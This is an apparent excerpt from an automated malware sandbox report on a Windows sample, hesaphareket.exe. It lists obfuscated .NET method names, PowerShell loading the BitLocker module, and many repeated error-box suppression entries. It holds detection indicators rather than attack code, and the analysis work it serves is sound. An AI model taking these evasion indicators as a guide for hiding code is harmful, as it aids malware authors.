                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, DB0rNXPAoLV4WyNjdF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Btx9rWtq5b', 'uk39cmRRUK', 'nVq9zCv56U', 'LhcEoH7eWo', 'VDbEl4vON2', 'Q1OE9ahaST', 'P8AEED9J2P', 'Th6iW7dHfFQ6X7FOrT1'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, W6NSRHll0U5bw9XC3tb.csHigh entropy of concatenated method names: 'LHTZcPLMbY', 'YT6ZzHsRVl', 'WILdoL70ZS', 'vp2dlVI7lK', 'cWLd9J2e7Z', 'zFpdEYVYkx', 'BwJdF02pI2', 'f6qd0Yo2CR', 'WgkdbJ50Ie', 'EqkdpdRWoK'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, mOIpKGlo1GpcENTKgBe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GM5ZXgwT8a', 'fCsZffsj7E', 'g8mZ4R0GMB', 'YcIZeapJEL', 'GaCZWrRB3W', 'w5WZKryDVk', 'Q5PZHKI12j'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, U5httJGmuF5DPKTAnl.csHigh entropy of concatenated method names: 'WODpeODi3m', 'GU8pWccfKI', 'apepK3ZAWY', 'GclpHrqgKp', 'FGCpUYRnmL', 'tpIp8ovbEr', 'lcKpiIp4fD', 'buCpkHPPDM', 'hYiprDfCyQ', 'MLGpcFOgmI'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, RLmREhrq916NQ96X43.csHigh entropy of concatenated method names: 'EHQ1Sxwyti', 'Xga12LXQfU', 'U121N6YEQG', 'B8G1Qh1yH1', 'QUu1q9YoU5', 'Cde15S03Wo', 'Sfv1V00Agu', 'GIx1O5w1nW', 'VVs1DPEU4G', 'mmN17HELdn'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, lexLvIJdiNy80Kiycs.csHigh entropy of concatenated method names: 'EWWPBpBiCK', 'Hk8PydWYOm', 'mWoPG0mI62', 'NHKPJtTT9m', 'VI7PnSMCtY', 'rlMPuoBInv', 'Ya6PwSLbbs', 'zd2PIC8V70', 'b5OP1eN3UF', 'qHxPZxbwkP'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, aeCmgZzr3lXS43K00w.csHigh entropy of concatenated method names: 'xckZyDXYyE', 'DyWZG6Mvsu', 'puYZJpgQxs', 'IdEZSDsMwh', 'k3NZ29vhln', 'EKVZQy3SqN', 'FyAZqixl5F', 'dXsZa94APC', 'X2ZZCpaORR', 'fdhZYv6asd'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.csHigh entropy of concatenated method names: 'MtvE0N5Uva', 'dPsEbaNTHk', 'j8mEpuSoav', 'x5mEPiWnjc', 'SttEtgqnFw', 'pkCE6QwIfe', 'NhNELQ5kc4', 'MRGEjRuQWx', 'MQYE3V4rXg', 'j3mETGE6WI'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, ieSK5kStrek0doClXM.csHigh entropy of concatenated method names: 'uWQ60t4aX5', 'Kst6pS8WTS', 'RvU6tFa134', 'EQX6LjqvX2', 'WaV6jpo3wX', 'oohtUKCr8N', 'oCIt8YHeot', 'CyNtiZFkEO', 'z26tk66smp', 'jdJtrAI7BE'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, jcgak2caNw4QSExh2A.csHigh entropy of concatenated method names: 'MyLZPiu4sj', 'M0rZtTVits', 'NwlZ6wuld5', 'HyBZLTsctw', 'aOZZ1SEAQE', 'quGZjPlNBC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, p05yAfxmLTNU99P8HE.csHigh entropy of concatenated method names: 'He0tm93yN4', 'KxntAQlgIe', 'mT1PN91UAd', 'ELmPQSAsDj', 'rJcPq9XBrE', 'U4GP5VnYBe', 'Mp8PVWqfeg', 'fstPOWhkM1', 'J3CPDaUpnl', 'T9bP7rba57'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, mOLxEjDHWYc8XOHddC.csHigh entropy of concatenated method names: 'yd9LCR8u1n', 'U1cLYEpKjY', 'zAyLgVFVd2', 'RkwLBrvS1W', 'TGJLmUihiN', 'eqfLyMprRc', 'gKcLAnXMZa', 'SXdLG5KSjJ', 'B89LJ0PGoI', 'BHmLxfYVLU'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, hjyEGc4iSUQJitRU4D.csHigh entropy of concatenated method names: 'hEohGFWLcN', 'TEuhJPQGQ5', 'WWohSIhZit', 'uPkh2qFAi8', 'isjhQiZQTY', 'rpHhqXXaaK', 'JiGhVyilRt', 'tGGhOJTOYq', 'rCbh7Ulimm', 'jAphXfmpak'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, SlnkX0H8ePrsk99m6e.csHigh entropy of concatenated method names: 'NG5wTXIC85', 'FBXwvQBpDc', 'ToString', 'w4uwbey0gE', 'EZlwpqQXuY', 'Sj2wP3bmof', 'qlbwtKWbM7', 'Y1Zw6bta4Q', 'clSwLgsdHr', 'RRUwjchwIp'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, ibdPOaiOutWPyPGkXx.csHigh entropy of concatenated method names: 'OKV1nk4AnC', 'nHY1wiAMmF', 'f7o113tFhg', 'cZL1dkG9cI', 'wI01sowF27', 'S571axP4Bu', 'Dispose', 'DcdIbSkpup', 'xHeIptMuaX', 'Wa0IPHpr2o'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, hDpkvMpdbBM5WBbgWJ.csHigh entropy of concatenated method names: 'Dispose', 'hWPlryPGkX', 'EwI92jJoDR', 'zWWNV9QVqo', 'F4plcP3BnE', 'RaTlz0phgO', 'ProcessDialogKey', 'pbe9oLmREh', 'J919l6NQ96', 'O4399Lcgak'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, fXVa8kFOIcYK3XNYlr.csHigh entropy of concatenated method names: 'HqUlL5httJ', 'BuFlj5DPKT', 'qdilTNy80K', 'Vyclvsu05y', 'bP8lnHE6eS', 'S5klutrek0', 'DgqkD1NxNqBfkUtTIa', 'rmDoFBmw3a6ero2pC3', 'E9HllxmuOj', 'VP7lENrISR'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, TJDjG497EqNjuMFx6Z.csHigh entropy of concatenated method names: 'u3UgKC4yB', 'YlqBxendn', 'Tu0ybaZt0', 'US0AR1lmQ', 'WK3JQNcv9', 'nYwxcukjr', 'qSBeSl7BZjVK8weRGs', 'suxM4FpgqBCmf8p6hc', 'ISfsPv4GoKOnR7gMrQ', 'vSIIZ4ETe'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Oxe9Fwe6IFE8xU8ZF3.csHigh entropy of concatenated method names: 'aaQn7AefGP', 'YqHnfZPywl', 'JXKneBAPRi', 'MAlnWLAchr', 'mRLn2VKa0T', 'OMCnNCCo3V', 'KbxnQygTqc', 'Cfxnq8hU3l', 'FlJn5db8A1', 'LREnV8Vt6x'
                    Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, uvYZ8UlFZYq1wXdFnMx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Lu0M1Flf3i', 'vMdMZPKKkW', 'hLjMdAaFYk', 'gtJMMRYbjp', 'fZcMsUjIKA', 'WPmMRPuJZy', 'WItMaiMF0P'

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
